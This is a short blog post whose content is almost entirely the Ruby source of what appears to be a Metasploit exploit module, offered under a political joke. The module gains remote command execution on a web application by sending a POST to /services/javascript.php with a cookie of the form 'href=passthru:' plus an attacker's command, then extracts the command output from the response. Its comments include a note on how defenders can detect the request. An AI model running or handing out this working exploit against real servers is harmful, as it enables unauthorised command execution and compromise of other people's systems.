Friday, April 6, 2018

Here's Hillary's favourite code :) "This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions."

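# Sends a single POST to <URI>/services/javascript.php whose Cookie header is
# "href=<function>:<arguments>", then prints the part of the response body
# that sits between two copies of a random six-letter marker.
#
# Reads datastore['URI'] and datastore['APP'] for the target path and the
# "app" form field, and payload.raw for the command text placed in the cookie.
# handler is always called last, whether or not a response came back.
#
# Defender note: on the server side this request shows up as a POST to
# /services/javascript.php carrying a cookie named "href" whose value has the
# shape "<function name>:<command>". Where cookies are captured (request
# logs, WAF, proxy), that shape is the thing to alert on.
#
# @return whatever handler returns
def exploit
  # Normalise the base path to one leading slash and no trailing slash,
  # because the fixed "/services/javascript.php" suffix supplies its own.
  uri = datastore['URI']
  uri = '/' + uri unless uri.start_with?('/')
  uri = uri.chomp('/')

  function = "passthru"
  # Random marker echoed before and after the command output so the output
  # can be cut out of the surrounding response body.
  key = Rex::Text.rand_text_alpha(6)
  arguments = "echo #{key}`"+payload.raw+"`#{key}"

  res = send_request_cgi({
    'uri'     => uri + "/services/javascript.php",
    'method'  => 'POST',
    'ctype'   => 'application/x-www-form-urlencoded',
    'data'    => "app="+datastore['APP']+"&file=open_calendar.js",
    'headers' =>
    {
      'Cookie' => "href="+function+":"+arguments,
      'Connection' => 'Close',
    }
  }) # default timeout

  # send_request_cgi can hand back nil (the guard below exists for that), so
  # the body is only read when a response actually arrived. Previously a nil
  # response raised NoMethodError on res.body and handler was never reached.
  output = nil
  if res
    print_status("The server returned: #{res.code} #{res.message}")
    output = res.body.to_s.split(key)[1]
  end

  if output
    print_status(output)
  else
    print_error("No response found")
  end

  handler
end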


Man in the Rain